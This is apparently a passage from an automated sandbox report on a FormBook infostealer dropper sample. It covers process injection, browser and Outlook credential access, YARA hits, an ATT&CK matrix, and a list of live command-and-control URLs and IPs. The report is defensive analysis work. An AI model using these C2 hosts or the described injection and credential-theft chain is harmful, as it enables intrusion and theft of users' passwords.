            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60BBE mov eax, dword ptr fs:[00000030h]4_2_00B60BBE
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B58BF0 mov eax, dword ptr fs:[00000030h]4_2_00B58BF0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B58BF0 mov eax, dword ptr fs:[00000030h]4_2_00B58BF0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B58BF0 mov eax, dword ptr fs:[00000030h]4_2_00B58BF0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7EBFC mov eax, dword ptr fs:[00000030h]4_2_00B7EBFC
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BDCBF0 mov eax, dword ptr fs:[00000030h]4_2_00BDCBF0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFEBD0 mov eax, dword ptr fs:[00000030h]4_2_00BFEBD0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C04BB0 mov eax, dword ptr fs:[00000030h]4_2_00C04BB0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C04BB0 mov eax, dword ptr fs:[00000030h]4_2_00C04BB0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B50BCD mov eax, dword ptr fs:[00000030h]4_2_00B50BCD
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B50BCD mov eax, dword ptr fs:[00000030h]4_2_00B50BCD
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B50BCD mov eax, dword ptr fs:[00000030h]4_2_00B50BCD
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B70BCB mov eax, dword ptr fs:[00000030h]4_2_00B70BCB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B70BCB mov eax, dword ptr fs:[00000030h]4_2_00B70BCB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B70BCB mov eax, dword ptr fs:[00000030h]4_2_00B70BCB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1AB40 mov eax, dword ptr fs:[00000030h]4_2_00C1AB40
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C04B4B mov eax, dword ptr fs:[00000030h]4_2_00C04B4B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C04B4B mov eax, dword ptr fs:[00000030h]4_2_00C04B4B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C22B57 mov eax, dword ptr fs:[00000030h]4_2_00C22B57
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C22B57 mov eax, dword ptr fs:[00000030h]4_2_00C22B57
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C22B57 mov eax, dword ptr fs:[00000030h]4_2_00C22B57
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C22B57 mov eax, dword ptr fs:[00000030h]4_2_00C22B57
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7EB20 mov eax, dword ptr fs:[00000030h]4_2_00B7EB20
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7EB20 mov eax, dword ptr fs:[00000030h]4_2_00B7EB20
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCEB1D mov eax, dword ptr fs:[00000030h]4_2_00BCEB1D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCEB1D mov eax, dword ptr fs:[00000030h]4_2_00BCEB1D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCEB1D mov eax, dword ptr fs:[00000030h]4_2_00BCEB1D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0041D192 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,2_2_0041D192
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040B88B SetUnhandledExceptionFilter,2_2_0040B88B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040B8AE SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0040B8AE

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Injects a PE file into a foreign processes
            Source: C:\Windows\SysWOW64\typeperf.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6D20E0000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\btpqr.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeSection loaded: unknown target: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeSection loaded: unknown target: C:\Windows\SysWOW64\typeperf.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: unknown target: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: unknown target: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\typeperf.exeThread APC queued: target process: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\typeperf.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6D20E0000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeProcess created: C:\Users\user\AppData\Local\Temp\btpqr.exe C:\Users\user\AppData\Local\Temp\btpqr.exeJump to behavior
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeProcess created: C:\Windows\SysWOW64\typeperf.exe C:\Windows\SysWOW64\typeperf.exeJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
            Source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000000.1446410687.00000000010D1000.00000002.00000001.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000002.3838833200.00000000010D0000.00000002.00000001.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3838987001.00000000011A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000000.1446410687.00000000010D1000.00000002.00000001.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000002.3838833200.00000000010D0000.00000002.00000001.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3838987001.00000000011A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000000.1446410687.00000000010D1000.00000002.00000001.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000002.3838833200.00000000010D0000.00000002.00000001.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3838987001.00000000011A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
            Source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000000.1446410687.00000000010D1000.00000002.00000001.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000002.3838833200.00000000010D0000.00000002.00000001.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3838987001.00000000011A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040E35B cpuid 2_2_0040E35B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_0041783A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: GetLocaleInfoW,2_2_00419961
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,2_2_0040A970
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,2_2_0040D9E2
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00419A89
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_00419B36
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: _memset,_TranslateName,_TranslateName,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00419B9E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,GetLocaleInfoW,2_2_004193BE
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_00417431
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: EnumSystemLocalesW,2_2_0040D55D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00415534
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: GetLocaleInfoW,2_2_0040D59A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_0041966E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: EnumSystemLocalesW,2_2_0041962E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_00417E3E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_004196EB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,2_2_0041976E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_004115AC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_004115AC
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040312A

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.btpqr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.btpqr.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3839288746.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1526993010.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1527458942.0000000003670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Yara detected NSISDropper
            Source: Yara matchFile source: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\typeperf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.btpqr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.btpqr.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3839288746.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1526993010.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1527458942.0000000003670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Yara detected NSISDropper
            Source: Yara matchFile source: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
            Valid Accounts1
            Native API            		Path Interception412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Email Collection            		Exfiltration Over Other Network Medium1
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
            System Shutdown/Reboot            		Acquire InfrastructureGather Victim Identity Information
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts412
            Process Injection            		LSASS Memory151
            Security Software Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		Exfiltration Over Bluetooth3
            Ingress Tool Transfer            		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
            Domain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		Automated Exfiltration4
            Non-Application Layer Protocol            		Data Encrypted for ImpactDNS ServerEmail Addresses
            Local AccountsCronLogin HookLogin Hook3
            Obfuscated Files or Information            		NTDS2
            Process Discovery            		Distributed Component Object Model1
            Clipboard Data            		Traffic Duplication4
            Application Layer Protocol            		Data DestructionVirtual Private ServerEmployee Names
            Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Software Packing            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
            Replication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
            File and Directory Discovery            		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
            External Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync26
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1355380 Sample: Payment_Copy_[SWIFT_COPY].exe Startdate: 07/12/2023 Architecture: WINDOWS Score: 100 34 www.zbbqis.store 2->34 36 www.speedbikesglobal.com 2->36 38 23 other IPs or domains 2->38 48 Snort IDS alert for network traffic 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for URL or domain 2->52 54 6 other signatures 2->54 11 Payment_Copy_[SWIFT_COPY].exe 17 2->11         started        signatures3 process4 file5 32 C:\Users\user\AppData\Local\Temp\btpqr.exe, PE32 11->32 dropped 14 btpqr.exe 1 11->14         started        process6 signatures7 64 Multi AV Scanner detection for dropped file 14->64 66 Detected unpacking (changes PE section rights) 14->66 68 Machine Learning detection for dropped file 14->68 70 Maps a DLL or memory area into another process 14->70 17 btpqr.exe 14->17         started        20 conhost.exe 14->20         started        process8 signatures9 46 Maps a DLL or memory area into another process 17->46 22 mNtjNwEeCHVoSqPJEzBvhXy.exe 17->22 injected process10 process11 24 typeperf.exe 13 22->24         started        signatures12 56 Tries to steal Mail credentials (via file / registry access) 24->56 58 Tries to harvest and steal browser information (history, passwords, etc) 24->58 60 Writes to foreign memory regions 24->60 62 3 other signatures 24->62 27 mNtjNwEeCHVoSqPJEzBvhXy.exe 24->27 injected 30 firefox.exe 24->30         started        process13 dnsIp14 40 belaflorloja.online 162.240.81.18, 49737, 49738, 49739 UNIFIEDLAYER-AS-1US United States 27->40 42 hmoatl.com 144.217.103.3, 49753, 49754, 49755 OVHFR Canada 27->42 44 11 other IPs or domains 27->44

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Payment_Copy_[SWIFT_COPY].exe30%ReversingLabsWin32.Trojan.Sonbokli
            Payment_Copy_[SWIFT_COPY].exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\btpqr.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\btpqr.exe24%ReversingLabsWin32.Trojan.Generic

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://mozilla.org0/0%URL Reputationsafe
            http://porousworld.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=xSDcG6j100%Avira URL Cloudmalware
            http://www.633922.com0%Avira URL Cloudsafe
            http://www.blessingstation.org/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp3QsCSEIlQr7ZxZGtQx938wNB79Up+t5frQyoMoLXF0pXDVrMpxqlwTFbA==0%Avira URL Cloudsafe
            http://www.hmoatl.com/m858/0%Avira URL Cloudsafe
            http://www.633922.com/m858/0%Avira URL Cloudsafe
            http://www.cjjmobbbshhhu.shop/m858/?nRRpS=VXEesAUKk48GI7/v/F/vk/2J7KfCFYqlfqdzSz80FcScnenugkkRQu/gNtJifjh8nwe2JaaLs5Szx6+RWLiYtzUoBAQbExEboA==&w6i=ADXH7n8hwvbLKF6100%Avira URL Cloudmalware
            http://nginx.net/0%Avira URL Cloudsafe
            http://www.cjjmobbbshhhu.shop/m858/100%Avira URL Cloudmalware
            http://www.sorenad.com/m858/100%Avira URL Cloudmalware
            http://www.lets-room.online/m858/100%Avira URL Cloudmalware
            http://www.speedbikesglobal.com/m858/100%Avira URL Cloudmalware
            http://www.porousworld.com/m858/100%Avira URL Cloudmalware
            https://rytrk.com/track.100%Avira URL Cloudmalware
            http://www.belaflorloja.online/m858/100%Avira URL Cloudmalware
            http://www.ozzventures.shop/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=E3d5DyrEcfJbX1PJB/KGYac5KRSYq3LrneiR+hvnGmPole79cfvMffiwEvZVyE+NwNCm4kMx2S50UNzNVB069nu2XDEJbhHAtQ==100%Avira URL Cloudmalware
            http://sorenad.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD100%Avira URL Cloudmalware
            https://rytrk.com100%Avira URL Cloudmalware
            http://www.fortunetravelsltd.com/m858/?nRRpS=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FGv9KJFWM1d64+w==&w6i=ADXH7n8hwvbLKF6100%Avira URL Cloudmalware
            http://www.hillcresthealth.online/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=unslu3ANnB0jwEgO8dBJ1wGsM1BVB71C8A+lB2lk4lRhZ2GNTPRbQ9k43BlJiddJ5udbRNs+X5XglvYJR+tWoycotxYusBU4lA==0%Avira URL Cloudsafe
            http://fortunetravelsltd.com/m858/?nRRpS=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSx100%Avira URL Cloudmalware
            http://www.fortunetravelsltd.com/m858/100%Avira URL Cloudmalware
            http://www.medical-loan24.live/m858/100%Avira URL Cloudmalware
            http://www.greenharbor.info/m858/100%Avira URL Cloudmalware
            http://www.sorenad.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJjJTNUnrI50PFHD/luRytaX7y+uiX625dNPSr5MT6J+IM8w==100%Avira URL Cloudmalware
            http://www.greenharbor.info/m858/?nRRpS=l3PhQIcXSIPbTWu7p/uiREsJUVtNOEFcSOOLMhvnuN6H7BalBQjl+86I6Nr3Qdue789gEwulMvGUQuhGePzt1TzPXk8Fubw2qA==&w6i=ADXH7n8hwvbLKF6100%Avira URL Cloudmalware
            http://www.blessingstation.org/m858/0%Avira URL Cloudsafe
            http://www.hillcresthealth.online/m858/0%Avira URL Cloudsafe
            http://www.hmoatl.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=vUVAFHoFovduHd4/DKwXed3af3ePb0vry6dcW+l5/zrb0ZZNrBa0Shr1AhFt6JSAxzoXU5EndMSNZsLwoEVPEHAIn6yNHix56w==0%Avira URL Cloudsafe
            http://www.belaflorloja.online/m858/?nRRpS=7ouShKyUNVA5Yjh6oktqXavps0HIih1xZvCLkyS5t8G4GMV8fEbeekSmji8tZe+tjjZfsA6F4HW6RYQ7SobZsKbvkZ0uY+Z5mQ==&w6i=ADXH7n8hwvbLKF6100%Avira URL Cloudmalware
            http://www.speedbikesglobal.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=89rK36yXGQSz/ZuNhGBEnsWtjb41/X7NemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIiyM5CO9qwuDsBag==100%Avira URL Cloudmalware
            http://hillcresthealth.online/?ts=fE1vYmlsZUNsZWFuQmxhY2t8fDQ3OWMwfGJ1Y2tldDAwM3x8fHx8fDY1NzFiZTZiYj0%Avira URL Cloudsafe
            http://blessingstation.org/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

